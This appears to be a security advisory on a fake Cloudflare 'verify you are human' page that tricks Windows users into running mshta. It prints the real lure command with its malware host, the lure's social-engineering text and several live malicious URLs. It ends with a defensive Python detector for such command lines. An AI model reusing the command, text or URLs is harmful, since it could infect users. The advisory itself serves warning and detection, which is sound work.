Fake “Verify you are human” Cloudflare page: what to do?

If you come across a page that looks like a Cloudflare check and asks you to run code on your Windows machine, close the page and contact the webmaster. If your own website is affected by this malware, you need to remove it immediately: doing so protects your visitors and prevents reputation damage.

How does this malware work?

The fake Cloudflare page offers instructions on how to verify that you are human, but you are actually being instructed to run malware on your computer via mshta, a tool designed to run .hta files.

What to do if you are a victim?

If you fall for it and run the code from the command prompt, it’s best to reinstall the operating system.

Malicious code:

Unusual Web Traffic Detected
mshta http://bridge.tree-sock-rain.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"

1/61 security vendor flagged the .hta file as malicious
Kaspersky: HEUR:Trojan.Script.Generic
Antiy: Trojan[Ransom]/MP3.Spora.enc
Eset NOD32: JS/TrojanDownloader.Agent.ACCL trojan
Sitecheck (Sucuri): Known javascript malware: malware?fake_update.8.27
Any.run: https://app.any.run/tasks/94e80210-079b-431c-9cc3-21a8515326b7

@SkylineETH

Malicious URLs:
https://dareka4te.shop/endpoint
https://bsc-dataseed.binance.org
http://bridge.tree-sock-rain.today
https://i.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291

1. hxxp://bridge[.]tree-sock-rain[.]today/
Hosting Provider behind Cloudflare:
CHANGWAY-AS, HK
[email protected]

2. hxxps://i[.]jolttapestry[.]fun
Hosting Provider behind Cloudflare:
VDSINA-AS, RU
[email protected]

Malicious page content that instructs victims to execute the malicious code:

Unusual Web Traffic Detected
Our security system has identified irregular web activity originating from your IP address. Automated verification attempts have failed, and we were unable to confirm that you are a legitimate user.
To proceed with verification, please follow these steps:
1. Press Win + R to open Run.
2. Copy and paste Ctrl + V the following command:
3. Press Enter and wait for confirmation.
This manual verification step helps us ensure that your connection is secure and not part of an automated request. If you fail to complete this step, access to certain features may be temporarily restricted.
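
For triage after the steps above: commands typed into the Run dialog are kept in the per-user registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and process-creation logs record the mshta command line. The Python sketch below is an added example, not code from the original page; it flags the pattern shown under "Malicious code" (mshta, a remote URL, and verification-themed text after #). The sample lines and the example.invalid host are constructed, and the function names are hypothetical.

```python
import re

# mshta (optionally with a path, .exe or quotes) followed by its arguments.
MSHTA = re.compile(r'(?i)(?:^|[\\/\s"])mshta(?:\.exe)?"?\s+(?P<args>.+)$')
URL = re.compile(r'(?i)\bhttps?://[^\s"\'#]+')
# Words this kind of lure places in the text appended after '#'.
DECOY = re.compile(r'(?i)#.*\b(verif\w*|captcha|human|robot|cloudflare)\b')

def classify(cmdline: str) -> dict:
    """Score one command line taken from RunMRU or a process-creation log."""
    line = cmdline.strip()
    if line.endswith("\\1"):           # RunMRU values carry a trailing \1
        line = line[:-2].rstrip()
    m = MSHTA.search(line)
    if not m:
        return {"verdict": "ignore", "url": None, "decoy": False}
    args = m.group("args")
    url = URL.search(args)
    decoy = bool(DECOY.search(args))
    # Remote HTA plus fake verification text is the lure on this page;
    # a remote HTA without the text is still worth investigating.
    verdict = "clickfix-lure" if url and decoy else "remote-hta" if url else "local-hta"
    return {"verdict": verdict, "url": url.group(0) if url else None, "decoy": decoy}

def defang(url: str) -> str:
    """Make a URL safe to paste into tickets and chat."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

# Constructed sample lines (example.invalid is a placeholder host).
SAMPLES = [
    'mshta http://lure.example.invalid/ # "Cloudflare Verification Code: AAAA-BBBB"\\1',
    r'"C:\Windows\System32\mshta.exe" https://lure.example.invalid/a.hta',
    r'mshta.exe C:\Tools\inventory.hta',
    'notepad C:\\notes\\mshta-article.txt\\1',
]

def triage(lines):
    """Return (verdict, defanged URL) for every line that fetches a remote HTA."""
    hits = []
    for line in lines:
        r = classify(line)
        if r["verdict"] in ("clickfix-lure", "remote-hta"):
            hits.append((r["verdict"], defang(r["url"])))
    return hits

if __name__ == "__main__":
    for verdict, url in triage(SAMPLES):
        print(f"{verdict:14} {url}")
```

Feed it the exported RunMRU values of each user profile or the command-line field of your process-creation events; a "clickfix-lure" hit on a workstation means the pasted command was executed there.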